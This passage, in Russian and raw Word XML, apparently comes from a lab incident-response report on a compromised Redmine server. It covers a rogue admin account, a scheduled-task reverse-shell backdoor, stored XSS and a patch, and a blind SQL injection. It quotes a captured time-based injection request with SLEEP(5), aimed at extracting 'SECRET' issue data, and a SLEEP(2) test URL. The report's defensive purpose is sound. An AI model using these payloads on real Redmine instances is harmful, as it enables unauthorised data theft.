        <w:t xml:space="preserve">4.1.4 Обнаружение последствия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Redmine User”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Уже в ходе работы на сервере Redmine (подключение через WEB) было замечено следующее:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При переходе в проект DEV1 во вкладке wiki включен REST API (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-103">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 11</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), а также в коде упоминается пользователь с именем hacker (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-020">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 12</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), этого же странного пользователя мы обнаружим и в списках пользователей, кроме того, у него есть права администратора (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-021">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 13</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Этот же код мы видели в пакете события.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103"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1983581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103.jp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835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Обнаружение REST API</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="6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020"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1459784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59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Упоминание пользователя в коде</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="7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021"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="914137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141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Подозрительный пользователь с правами администратора</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="77"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заполняем карточку инцидента, в рекомендациях удаление нового пользователя (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-022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022"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2683873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83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Карточка инцидента</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="81"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="95" w:name="X84c2fde319737343f3f3f6e3f16a6ff377a7fa7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.5 Обнаружение уязвимости</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Blind SQL (CVE-2019-18890)”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний нарушитель ожидает, когда администратор просмотрит страницу с внедренным вредоносным кодом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутренний нарушитель проводит Blind SQL-инъекцию, получает доступ к данным конфиденциального проекта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Мы видим в событиях большое количество SQL запросов типа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT SLEEP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SELECT FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">от сервера 10.10.4.11 (нарушитель) на сервер Redmine 10.10.2.15, количество и постоянство которых настораживает (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-10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6" w:name="fig-105"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1560611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/105.jp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60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SQL-запросы</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="86"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В пакетах к запросам увидим:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /issues.xml?project_id=1&amp;subproject_id=2,3-IF%20((select%20description%20from%20issues%20where%20subject%20like%20%22SECRET%25%22)%20like%20%224%25%22,%20SLEEP(5),%20null); HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: redmine.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: python-requests/2.31.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот пакет указывает на попытку BLIND-SQL-инъекции через API Redmine, с целью извлечения данных из таблицы issues (например, описаний задач с заголовками, начинающимися на SECRET). Использование SLEEP(5) позволяет злоумышленнику косвенно определять, выполняются ли условия, на основе времени ответа сервера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При заполнении карточки уязвимости (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-107">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 16</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) ссылаемся на гитхаб</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[5]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-025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0" w:name="fig-107"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2756594"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="88" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/107.jpg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56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Карточка инцидента</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="9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025"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2249143"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="92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491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Источник информации об уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="94"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="154" w:name="устранение-уязвимостей-и-их-последствий"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Устранение уязвимостей и их последствий</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="105" w:name="Xd7c629addee95e6fef6a541c62fc75887b8643e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.1 Уязвимость Слабый пароль пользователя DEV-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для закрытия уязвимости меняем пароль на более сложный, не содержащийся в словаре. Для изменения пароля на сервере MS Active Directory подключаемся к нему через удаленный рабочий стол. Открываем на нем «Active Directory Users and Computers» через комбинацю</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Win+R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и ввод в поиск</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dsa.msc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, переходим в users, находим dev1, меняем пароль для пользователя dev1 (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-001">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 18</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-002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001"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2630072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1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30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Пользователь dev1</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="10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4" w:name="fig-002"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2549912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image/2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499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Смена пароля</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="104"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="118" w:name="последствие-developer-backdoor"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.2 Последствие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Developer backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через удаленный рабочий стол переходим на сервер Developer (10.10.4.13), на сервере через</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Win+R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и ввод в поиск</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">taskschd.msc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сможем открыть планировщик задач (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-108">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нарушитель может создать сервис, автоматически запускающий исполняемый файл, который устанавливает Reverse Shell подключение. Новая задача, записанная нарушителем, находится на узле Developer 1 в планировщике задач (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-003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108"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="210026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108.jp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002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Запуск исполняемого файла в планировщике</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="10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3" w:name="fig-003"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2921000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="111" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/3.png" id="1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2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Запуск исполняемого файла в планировщике</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="113"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Удаляем задачу в планировщике, и теперь надо удалить файл. Во вкладке action мы обнаружили путь к файлу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\dev1\Downloads\svchosting.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, благодаря этому нашли его и удалили.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7" w:name="fig-109"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2785764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image/109.jpg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85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Путь к исполняемому файлу</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="117"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkStart w:id="135" w:name="уязвимость-атака-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.3 Уязвимость атака XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для устранения этой уязвимости нам нужно будет зайти на Redmine и через веб-браузер, и через консоль по ssh подключению.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В Redmine до версии 4.0.4 постоянный XSS существует из-за ошибок форматирования при работе с textile текстом. В данном сценарии используется для включения REST API для эксплуатации следующей уязвимости (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-004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004"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1124444"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="120" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/4.png" id="1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244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Пример добавления кода, выводящего на экран надпись XSS в wiki-страницу</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="122"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для устранения этой уязвимости необходимо внести изменения в код Redmine. Необходимо найти обработку текста wiki-страницы при наличии в тексте html-тегов. Из описания уязвимости понятно, что необходимо найти библиотеку для преобразования textile разметки в html. В Redmine за данное преобразование отвечает файл redcloth3.rb. Для устранения изменим в нем (все изменения через</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nano \var\www\redmine-3.3.4\lib\redcloth3.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) следующие строки (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-005">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 24</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Удаляем тег pre из разрешенных тегов, версию правильного кода можем подсмотреть на github:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/redmine/redmine/blob/master/lib/redmine/wiki_formatting/textile/redcloth3.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[6]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6" w:name="fig-005"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="728296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image/5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28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Содержимое файла redcloth3.rb</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="126"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код, исправляющий уязвимость CVE-2019-17427:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_TAGS = %w(redpre pre code kbd notextile)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    def escape_html_tags(text)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        text.gsub!(%r{&lt;(\/?([!\w]+)[^&lt;&gt;\n]*)(&gt;?)}) do |m|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            if ALLOWED_TAGS.include?($2) &amp;&amp; $3.present?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                "&lt;#{$1}#{$3}"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                "&lt;#{$1}#{'&gt;' unless $3.blank?}"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    end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0" w:name="fig-006"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1446847"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="128" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/6.png" id="1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46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Исправления в файле redcloth3.rb</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="130"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После внесения изменений необходимо перезапустить службу веб-сервера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl restart nginx.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Видим, что уязвимость успешно устранена, так как изменилось отображение страницы на Redmine Wiki (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-007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4" w:name="fig-007"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="1116373"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="132" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/7.png" id="1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16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Успешное устранение уязвимости</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="134"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="140" w:name="последствие-redmine-user"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.4 Последствие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Redmine User”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нарушитель создал пользователя на портале Redmine. Пользователь, обладающий правами администратора, имеет неограниченный доступ к пользовательской базе. Для обнаружения добавления нового привилегированного пользователя заходим в консоль администратора Redmine, переходим в раздел «Administration» – «Users» и смотрим список существующих пользователей (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-008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9" w:name="fig-008"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="402338"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="137" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/8.png" id="1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2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Список пользователей Redmine</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="139"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Удаляем пользователя hacker через веб-интерфейс, успешно нейтрализуя последствие Redmine User.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="153" w:name="уязвимость-blind-sql-инъекция"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.5 Уязвимость Blind SQL-инъекция</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатируемая уязвимость – CVE-2019-18890.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В Redmine до версии 3.2.9 и 3.3.x до версии 3.3.10 уязвимость позволяет пользователям Redmine получать доступ к защищенной информации с помощью сгенерированного объектного запроса. Уязвимость реализуется посимвольным перебором с замером времени ответа. В данном сценарии данная уязвимость используется для получения конфиденциальной информации из БД, минуя разграничение доступа Redmine. Время прихода пакета является индикатором: при запоздании пакета – символ подобран верно, иначе – перебор продолжается (</w:t>
      </w:r>
      <w:hyperlink w:anchor="fig-106">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">рис. 28</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Попробуем сделать SQL запрос на WEB сервер Redmine SLEEP(2) (с помощью ссылки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://redmine.ampire.corp/issues.xml?project_id=1&amp;subproject_id=2,3-SLEEP(2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), увидим, что время ожидания ответа возрастает почти до 9 секунд, что свидетельствует об инъекции.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4" w:name="fig-106"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline>
                  <wp:extent cx="3733800" cy="2085677"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="" title="" id="142" name="Picture"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image/106.jpg" id="1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56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SQL-запрос</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="144"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для устранения этой уязвимости необходимо внести изменения в код Redmine. Снова через SSH заходим на Redmine с помощью консоли. Исходя из адреса и запроса следует найти местоположение скрипта, где происходит обработка параметра subproject_id. В данном случае рассмотрен файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\var\www\redmine-3.3.4\app\models\query.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[6]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
